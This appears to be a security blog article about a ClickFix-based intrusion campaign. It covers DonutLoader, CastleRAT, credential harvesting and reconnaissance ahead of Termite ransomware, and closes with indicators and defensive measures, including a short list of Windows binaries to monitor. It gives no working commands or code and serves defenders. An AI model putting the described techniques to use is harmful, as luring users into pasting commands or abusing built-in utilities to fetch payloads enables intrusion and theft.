Ransomware attacks rarely rely on a single tool or exploit anymore. Instead, modern cybercriminal operations combine social engineering, built-in Windows utilities, and multi-stage malware loaders to quietly establish persistence inside networks.
A recent investigation highlighted how threat actors are leveraging the ClickFix technique alongside CastleRAT and DonutLoader to prepare environments for Termite ransomware attacks. The activity has been linked to a threat actor cluster known as Velvet Tempest, which has historical ties to major ransomware families.
This campaign demonstrates how attackers are shifting from noisy exploit-based intrusions to living-off-the-land attacks that blend malicious behavior with legitimate system tools.
In this article, we’ll break down the attack chain, techniques used, and key defensive lessons for security teams.
The Threat Actor: Velvet Tempest
The activity has been attributed to a threat actor tracked as Velvet Tempest, also known as DEV-0504. This group is believed to have links to several well-known ransomware ecosystems including Ryuk, REvil, Conti, and BlackCat.
Researchers observed the attackers operating inside a simulated enterprise environment for 12 days, allowing analysts to capture the full progression of the intrusion — from initial access to pre-ransomware reconnaissance.
Instead of deploying ransomware immediately, the attackers spent time performing:
- Credential harvesting
- Active Directory enumeration
- Environment profiling
- Lateral movement preparation
These steps indicate a deliberate pre-ransomware staging phase.
Initial Access: The ClickFix Social Engineering Technique
At the entry point of the attack is a clever social engineering trick known as ClickFix.
ClickFix campaigns typically present victims with a fake problem prompt, such as:
- A CAPTCHA verification failure
- Browser security warning
- System troubleshooting message
The page then instructs the user to copy and paste a command into the Windows Run dialog as a supposed fix.
In reality, the copied command triggers a malicious chain that downloads additional payloads.
This approach is effective because:
- It bypasses many security prompts
- The user performs the action themselves
- It avoids exploit-based detection
Essentially, the victim unknowingly executes the malware delivery command.
Malware Delivery Chain
Once the command is executed, the attackers deploy a multi-stage malware chain designed to establish persistence.
Stage 1: Command Execution
The command triggers nested cmd.exe execution chains that leverage legitimate Windows utilities.
In some observed cases, the attackers used finger.exe, a rarely used Windows utility, to download the initial payload.
Using such tools helps attackers remain stealthy.
Stage 2: DonutLoader
Next, the attackers deploy DonutLoader, a malware loader designed to execute payloads directly in memory.
Key features include:
- In-memory execution
- Obfuscation capabilities
- Delivery of additional malware components
The loader prepares the system for the next stage of the attack.
Stage 3: CastleRAT Backdoor
After DonutLoader executes, it installs CastleRAT, a remote access trojan.
CastleRAT enables attackers to:
- Maintain persistent remote access
- Execute commands
- Deploy additional payloads
- Download information stealers
The RAT can also deploy tools like LummaStealer and other post-exploitation utilities.
At this stage, the attacker effectively controls the compromised system.
Pre-Ransomware Reconnaissance
Interestingly, during the monitored intrusion researchers did not observe the deployment of Termite ransomware itself.
However, the attackers performed several actions typically associated with ransomware preparation:
- Active Directory discovery
- Credential harvesting via PowerShell scripts
- Drive enumeration
- Network mapping
These activities strongly indicate preparation for a future ransomware deployment phase.
Why This Attack Is Difficult to Detect
One of the most concerning aspects of this campaign is how it blends malicious activity with legitimate system behavior.
The attackers relied heavily on:
- PowerShell
- Windows command utilities
- Legitimate binaries
- Memory-resident malware
Security tools often struggle to detect such attacks because the actions look similar to normal administrative activity.
This tactic is commonly referred to as Living off the Land (LotL).
Key Indicators of Compromise
Security teams should watch for indicators such as:
Suspicious behaviors
- Users executing unexpected commands in Windows Run
- PowerShell scripts retrieving external payloads
- Unusual usage of
finger.exeor other rarely used utilities
Post-exploitation activity
- Active Directory enumeration
- Credential dumping
- Network drive scanning
Monitoring behavioral anomalies is often more effective than relying solely on malware signatures.
Defensive Strategies for Organizations
Organizations can reduce risk from these attacks through several defensive measures.
1. Limit Script Execution
Restrict PowerShell usage with:
- Constrained Language Mode
- Script block logging
- PowerShell execution policies
2. Monitor Living-off-the-Land Binaries
Track abnormal usage of tools such as:
cmd.exepowershell.exefinger.exe
These utilities are frequently abused in modern attacks.
3. Deploy Behavioral Detection
Security teams should rely on:
- EDR platforms
- anomaly-based monitoring
- threat hunting
Traditional signature-based detection is insufficient for these attacks.
4. Security Awareness Training
Because ClickFix relies on user interaction, awareness training is critical.
Employees should be warned never to:
- Paste commands from websites
- Execute troubleshooting commands they do not understand
Final Thoughts
The ClickFix campaign highlights an evolving ransomware ecosystem where attackers increasingly rely on stealth, deception, and legitimate tools instead of obvious malware exploits.
Rather than launching ransomware immediately, threat actors first establish long-term access, collect credentials, and map the environment. Only after they fully understand the network do they deploy the final payload.
The combination of ClickFix, DonutLoader, and CastleRAT shows how modern attacks are becoming modular, flexible, and harder to detect.
For defenders, the lesson is clear:
The future of ransomware defense lies not just in malware detection — but in behavioral monitoring and proactive threat hunting.
